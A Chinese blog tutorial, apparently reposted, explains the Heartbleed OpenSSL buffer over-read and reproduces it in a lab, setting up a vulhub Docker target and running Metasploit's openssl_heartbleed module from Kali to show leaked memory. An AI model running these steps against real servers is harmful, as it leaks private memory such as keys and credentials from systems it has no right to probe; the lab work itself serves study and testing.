心脏出血（Heartbleed）漏洞浅析、复现

大家好，又见面了，我是你们的朋友全栈君。

一、漏洞介绍 心脏出血（英语：Heartbleed），也简称为心血漏洞，是一个出现在加密程序库OpenSSL的安全漏洞，该程序库广泛用于实现互联网的传输层安全（TLS）协议。它于2012年被引入了软件中，2014年4月首次向公众披露。只要使用的是存在缺陷的OpenSSL实例，无论是服务器还是客户端，都可能因此而受到攻击。此问题的原因是在实现TLS的心跳扩展时没有对输入进行适当验证（缺少边界检查），因此漏洞的名称来源于“心跳”（heartbeat）。该程序错误属于缓冲区过读，即可以读取的数据比应该允许读取的还多。 Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容，这样一来受害者的内存内容就会以每次64KB的速度进行泄露。 二、漏洞复现 靶机：centos7 192.168.81.136 攻击机：kali 192.168.81.135 确保两台测试机网络能通

使用docker+vulhub搭建漏洞环境，在centos7上搭建vulhub的步骤如下： 1、安装docker依赖包 yum install -y yum-utils device-mapper-persistent-data lvm2 2、安装docker yum install docker 3、启动docker systemctl start docker 4、下载vulhub https://github.com/vulhub/vulhub/archive/master.zip 5、找到heartbleed，并进入,输入命令docker-compose up -d运行漏洞环境

6、查看运行情况

7、打开kali，运行metaspolit

8、使用metasploit进行攻击 1）搜索相关漏洞模块儿 search Heartbleed

2）使用相关攻击模块 use auxiliary/scanner/ssl/openssl_heartbleed

3）查看需要配置的选项 Show options

4）对required为yes但是current setting为空的项进行设置，这里我们只需要设置rhosts（靶机ip） set rhosts 192.168.81.136

5）开始攻击并查看结果，出现白框字样表示漏洞存在 Run

6）set verbose true#(设置verbose，这个设置要设置成true才能看到泄露的信息) 此设置主要是为了显示整个过程以及leak出来的数据

注意：1、关闭防火墙 2、关闭selinux

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/160550.html原文链接：https://javaforall.cn